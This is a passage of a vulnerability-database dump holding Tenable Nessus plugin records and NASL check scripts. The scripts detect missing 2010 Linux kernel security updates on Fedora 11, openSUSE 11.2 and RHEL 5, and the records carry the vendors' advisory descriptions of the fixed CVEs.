kernel:\ntty->pgrp races 521265 oops in VIA padlock driver\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=547906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=550907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=551214\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=552126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=559100\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=560547\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-February/034830.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b8d616ab\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"kernel-2.6.30.10-105.2.13.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:03:43", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=568120", "https://bugzilla.novell.com/show_bug.cgi?id=568120", "https://bugzilla.novell.com/show_bug.cgi?id=540589", "https://bugzilla.novell.com/show_bug.cgi?id=537016", "https://bugzilla.novell.com/show_bug.cgi?id=564940", "https://bugzilla.novell.com/show_bug.cgi?id=535939", "https://bugzilla.novell.com/show_bug.cgi?id=551356", "https://bugzilla.novell.com/show_bug.cgi?id=552353", "https://bugzilla.novell.com/show_bug.cgi?id=573050", "https://bugzilla.novell.com/show_bug.cgi?id=574664", "https://bugzilla.novell.com/show_bug.cgi?id=568231", "https://bugzilla.novell.com/show_bug.cgi?id=565904", "https://bugzilla.novell.com/show_bug.cgi?id=565027", "https://bugzilla.novell.com/show_bug.cgi?id=565083", "https://bugzilla.novell.com/show_bug.cgi?id=568305", "https://bugzilla.novell.com/show_bug.cgi?id=570606", "https://bugzilla.novell.com/show_bug.cgi?id=557180", "https://bugzilla.novell.com/show_bug.cgi?id=492233", "https://bugzilla.novell.com/show_bug.cgi?id=567340", "https://bugzilla.novell.com/show_bug.cgi?id=569902", "https://bugzilla.novell.com/show_bug.cgi?id=569902"], "pluginID": "44411", "description": "The Linux kernel for openSUSE 11.2 was updated to 2.6.31.12 to fix the following bugs and security issues :\n\n - The permission of the devtmpfs root directory was incorrectly 1777 (instead of 755). If it was used, local attackers could escalate privileges. (openSUSE 11.2 does not use this filesystem by default). (CVE-2010-0299)\n\n - The poll_mode_io file for the megaraid_sas driver in the Linux kernel 2.6.31.6 and earlier has world-writable permissions, which allows local users to change the I/O mode of the driver by modifying this file.\n (CVE-2009-3939)\n\n - ebtables was lacking a CAP_NET_ADMIN check, making it possible for local unprivileged attackers to modify the network bridge management. (CVE-2010-0007)\n\n - An information leakage on fatal signals on x86_64 machines was fixed. (CVE-2010-0003)\n\n - A race condition in fasync handling could be used by local attackers to crash the machine or potentially execute code. (CVE-2009-4141)\n\n - The ipv6_hop_jumbo function in net/ipv6/exthdrs.c in the Linux kernel before 2.6.32.4, when network namespaces are enabled, allows remote attackers to cause a denial of service (NULL pointer dereference) via an invalid IPv6 jumbogram. (CVE-2010-0006)\n\n - drivers/net/e1000/e1000_main.c in the e1000 driver in the Linux kernel 2.6.32.3 and earlier handles Ethernet frames that exceed the MTU by processing certain trailing payload data as if it were a complete frame, which allows remote attackers to bypass packet filters via a large packet with a crafted payload.\n (CVE-2009-4536)\n\n - drivers/net/e1000e/netdev.c in the e1000e driver in the Linux kernel 2.6.32.3 and earlier does not properly check the size of an Ethernet frame that exceeds the MTU, which allows remote attackers to have an unspecified impact via crafted packets. (CVE-2009-4538)", "edition": 6, "reporter": "Tenable", "published": "2010-02-09T00:00:00", "title": "SuSE 11.2 Security Update: kernel (2010-01-28)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3939", "CVE-2010-0007", "CVE-2009-4141", "CVE-2009-4538", "CVE-2010-0299", "CVE-2009-4536", "CVE-2010-0003", "CVE-2010-0006"], "modified": "2018-07-31T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-trace", "p-cpe:/a:novell:opensuse:kernel-xen-devel", "p-cpe:/a:novell:opensuse:kernel-trace-base", "p-cpe:/a:novell:opensuse:kernel-vanilla-base", "p-cpe:/a:novell:opensuse:kernel-desktop-base", "p-cpe:/a:novell:opensuse:kernel-xen-base", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:preload-kmp-desktop", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:kernel-pae", "p-cpe:/a:novell:opensuse:kernel-pae-devel", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:preload-kmp-default", "p-cpe:/a:novell:opensuse:kernel-pae-base", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-trace-devel", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "p-cpe:/a:novell:opensuse:kernel-desktop-devel", "p-cpe:/a:novell:opensuse:kernel-desktop", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-default-base"], "id": "SUSE_11_2_KERNEL-100128.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44411", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Updates.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44411);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/31 17:27:54\");\n\n script_cve_id(\n \"CVE-2009-3939\",\n \"CVE-2009-4141\",\n \"CVE-2009-4536\",\n \"CVE-2009-4538\",\n \"CVE-2010-0003\",\n \"CVE-2010-0006\",\n \"CVE-2010-0007\",\n \"CVE-2010-0299\"\n );\n script_bugtraq_id(\n 37019,\n 37519,\n 37523,\n 37724,\n 37762,\n 37806,\n 37810,\n 38437\n );\n script_name(english:\"SuSE 11.2 Security Update: kernel (2010-01-28)\");\n script_summary(english:\"Check for the kernel package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Linux kernel for openSUSE 11.2 was updated to 2.6.31.12 to fix the\nfollowing bugs and security issues :\n\n - The permission of the devtmpfs root directory was\n incorrectly 1777 (instead of 755). If it was used, local\n attackers could escalate privileges. (openSUSE 11.2 does\n not use this filesystem by default). (CVE-2010-0299)\n\n - The poll_mode_io file for the megaraid_sas driver in the\n Linux kernel 2.6.31.6 and earlier has world-writable\n permissions, which allows local users to change the I/O\n mode of the driver by modifying this file.\n (CVE-2009-3939)\n\n - ebtables was lacking a CAP_NET_ADMIN check, making it\n possible for local unprivileged attackers to modify the\n network bridge management. (CVE-2010-0007)\n\n - An information leakage on fatal signals on x86_64\n machines was fixed. (CVE-2010-0003)\n\n - A race condition in fasync handling could be used by\n local attackers to crash the machine or potentially\n execute code. (CVE-2009-4141)\n\n - The ipv6_hop_jumbo function in net/ipv6/exthdrs.c in the\n Linux kernel before 2.6.32.4, when network namespaces\n are enabled, allows remote attackers to cause a denial\n of service (NULL pointer dereference) via an invalid\n IPv6 jumbogram. (CVE-2010-0006)\n\n - drivers/net/e1000/e1000_main.c in the e1000 driver in\n the Linux kernel 2.6.32.3 and earlier handles Ethernet\n frames that exceed the MTU by processing certain\n trailing payload data as if it were a complete frame,\n which allows remote attackers to bypass packet filters\n via a large packet with a crafted payload.\n (CVE-2009-4536)\n\n - drivers/net/e1000e/netdev.c in the e1000e driver in the\n Linux kernel 2.6.32.3 and earlier does not properly\n check the size of an Ethernet frame that exceeds the\n MTU, which allows remote attackers to have an\n unspecified impact via crafted packets. (CVE-2009-4538)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=565027\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=574664\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=573050\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=565904\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=492233\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=552353\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=557180\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=540589\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=565083\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=569902\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=570606\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=568231\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=567340\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=568120\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=537016\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=568120\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=569902\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=568305\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=551356\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=535939\");\n script_set_attribute(attribute:\"see_also\", value: \"https://bugzilla.novell.com/show_bug.cgi?id=564940\");\n script_set_attribute(attribute:\"solution\", value:\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 189, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:preload-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:preload-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/09\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-debug-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-debug-base-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-debug-devel-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-default-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-default-base-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-default-devel-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-desktop-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-desktop-base-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-desktop-devel-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-pae-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-pae-base-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-pae-devel-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-syms-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-trace-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-trace-base-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-trace-devel-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-vanilla-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-vanilla-base-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-vanilla-devel-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-xen-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-xen-base-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-xen-devel-2.6.31.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"preload-kmp-default-1.1_2.6.31.12_0.1-6.9.12\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"preload-kmp-desktop-1.1_2.6.31.12_0.1-6.9.12\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-debug / kernel-debug-base / kernel-debug-devel / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-29T19:19:35", "references": ["https://access.redhat.com/security/cve/cve-2009-4141", "https://access.redhat.com/security/cve/cve-2006-6304", "https://access.redhat.com/security/cve/cve-2009-3889", "https://access.redhat.com/security/cve/cve-2009-2910", "https://access.redhat.com/security/cve/cve-2009-4021", "https://access.redhat.com/errata/RHSA-2010:0046", "https://access.redhat.com/security/cve/cve-2009-4138", "https://access.redhat.com/security/cve/cve-2009-3556", "http://kbase.redhat.com/faq/docs/DOC-20536", "https://access.redhat.com/security/cve/cve-2009-3080", "https://access.redhat.com/security/cve/cve-2009-4020", "https://access.redhat.com/security/cve/cve-2009-4272", "https://access.redhat.com/security/cve/cve-2009-3939"], "pluginID": "44062", "description": "Updated kernel packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity fixes :\n\n* an array index error was found in the gdth driver. A local user could send a specially crafted IOCTL request that would cause a denial of service or, possibly, privilege escalation. (CVE-2009-3080, Important)\n\n* a flaw was found in the FUSE implementation. When a system is low on memory, fuse_put_request() could dereference an invalid pointer, possibly leading to a local denial of service or privilege escalation.\n(CVE-2009-4021, Important)\n\n* Tavis Ormandy discovered a deficiency in the fasync_helper() implementation. This could allow a local, unprivileged user to leverage a use-after-free of locked, asynchronous file descriptors to cause a denial of service or privilege escalation. (CVE-2009-4141, Important)\n\n* the Parallels Virtuozzo Containers team reported the RHSA-2009:1243 update introduced two flaws in the routing implementation. If an attacker was able to cause a large enough number of collisions in the routing hash table (via specially crafted packets) for the emergency route flush to trigger, a deadlock could occur. Secondly, if the kernel routing cache was disabled, an uninitialized pointer would be left behind after a route lookup, leading to a kernel panic.\n(CVE-2009-4272, Important)\n\n* the RHSA-2009:0225 update introduced a rewrite attack flaw in the do_coredump() function. A local attacker able to guess the file name a process is going to dump its core to, prior to the process crashing, could use this flaw to append data to the dumped core file. This issue only affects systems that have '/proc/sys/fs/suid_dumpable' set to 2 (the default value is 0). (CVE-2006-6304, Moderate)\n\nThe fix for CVE-2006-6304 changes the expected behavior: With suid_dumpable set to 2, the core file will not be recorded if the file already exists. For example, core files will not be overwritten on subsequent crashes of processes whose core files map to the same name.\n\n* an information leak was found in the Linux kernel. On AMD64 systems, 32-bit processes could access and read certain 64-bit registers by temporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n\n* the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV) support in the qla2xxx driver, resulting in two new sysfs pseudo files, '/sys/class/scsi_host/[a qla2xxx host]/vport_create' and 'vport_delete'. These two files were world-writable by default, allowing a local user to change SCSI host attributes. This flaw only affects systems using the qla2xxx driver and NPIV capable hardware.\n(CVE-2009-3556, Moderate)\n\n* permission issues were found in the megaraid_sas driver. The 'dbg_lvl' and 'poll_mode_io' files on the sysfs file system ('/sys/') had world-writable permissions. This could allow local, unprivileged users to change the behavior of the driver. (CVE-2009-3889, CVE-2009-3939, Moderate)\n\n* a NULL pointer dereference flaw was found in the firewire-ohci driver used for OHCI compliant IEEE 1394 controllers. A local, unprivileged user with access to /dev/fw* files could issue certain IOCTL calls, causing a denial of service or privilege escalation. The FireWire modules are blacklisted by default, and if enabled, only root has access to the files noted above by default. (CVE-2009-4138, Moderate)\n\n* a buffer overflow flaw was found in the hfs_bnode_read() function in the HFS file system implementation. This could lead to a denial of service if a user browsed a specially crafted HFS file system, for example, by running 'ls'. (CVE-2009-4020, Low)\n\nBug fix documentation for this update will be available shortly from www.redhat.com/docs/en-US/errata/RHSA-2010-0046/Kernel_Security_Update / index.html\n\nUsers should upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.", "edition": 10, "reporter": "Tenable", "published": "2010-01-20T00:00:00", "title": "RHEL 5 : kernel (RHSA-2010:0046)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3556", "CVE-2009-3939", "CVE-2009-4272", "CVE-2009-2910", "CVE-2009-4141", "CVE-2009-3080", "CVE-2006-6304", "CVE-2009-4020", "CVE-2009-3889", "CVE-2009-4021", "CVE-2009-4138"], "modified": "2018-11-28T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-xen", "cpe:/o:redhat:enterprise_linux:5.4", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE", "p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2010-0046.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44062", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0046. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44062);\n script_version (\"1.40\");\n script_cvs_date(\"Date: 2018/11/28 11:42:04\");\n\n script_cve_id(\"CVE-2006-6304\", \"CVE-2009-2910\", \"CVE-2009-3080\", \"CVE-2009-3556\", \"CVE-2009-3889\", \"CVE-2009-3939\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4272\");\n script_bugtraq_id(36576, 37019, 37068, 37069, 37339, 37806);\n script_xref(name:\"RHSA\", value:\"2010:0046\");\n\n script_name(english:\"RHEL 5 : kernel (RHSA-2010:0046)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes :\n\n* an array index error was found in the gdth driver. A local user\ncould send a specially crafted IOCTL request that would cause a denial\nof service or, possibly, privilege escalation. (CVE-2009-3080,\nImportant)\n\n* a flaw was found in the FUSE implementation. When a system is low on\nmemory, fuse_put_request() could dereference an invalid pointer,\npossibly leading to a local denial of service or privilege escalation.\n(CVE-2009-4021, Important)\n\n* Tavis Ormandy discovered a deficiency in the fasync_helper()\nimplementation. This could allow a local, unprivileged user to\nleverage a use-after-free of locked, asynchronous file descriptors to\ncause a denial of service or privilege escalation. (CVE-2009-4141,\nImportant)\n\n* the Parallels Virtuozzo Containers team reported the RHSA-2009:1243\nupdate introduced two flaws in the routing implementation. If an\nattacker was able to cause a large enough number of collisions in the\nrouting hash table (via specially crafted packets) for the emergency\nroute flush to trigger, a deadlock could occur. Secondly, if the\nkernel routing cache was disabled, an uninitialized pointer would be\nleft behind after a route lookup, leading to a kernel panic.\n(CVE-2009-4272, Important)\n\n* the RHSA-2009:0225 update introduced a rewrite attack flaw in the\ndo_coredump() function. A local attacker able to guess the file name a\nprocess is going to dump its core to, prior to the process crashing,\ncould use this flaw to append data to the dumped core file. This issue\nonly affects systems that have '/proc/sys/fs/suid_dumpable' set to 2\n(the default value is 0). (CVE-2006-6304, Moderate)\n\nThe fix for CVE-2006-6304 changes the expected behavior: With\nsuid_dumpable set to 2, the core file will not be recorded if the file\nalready exists. For example, core files will not be overwritten on\nsubsequent crashes of processes whose core files map to the same name.\n\n* an information leak was found in the Linux kernel. On AMD64 systems,\n32-bit processes could access and read certain 64-bit registers by\ntemporarily switching themselves to 64-bit mode. (CVE-2009-2910,\nModerate)\n\n* the RHBA-2008:0314 update introduced N_Port ID Virtualization 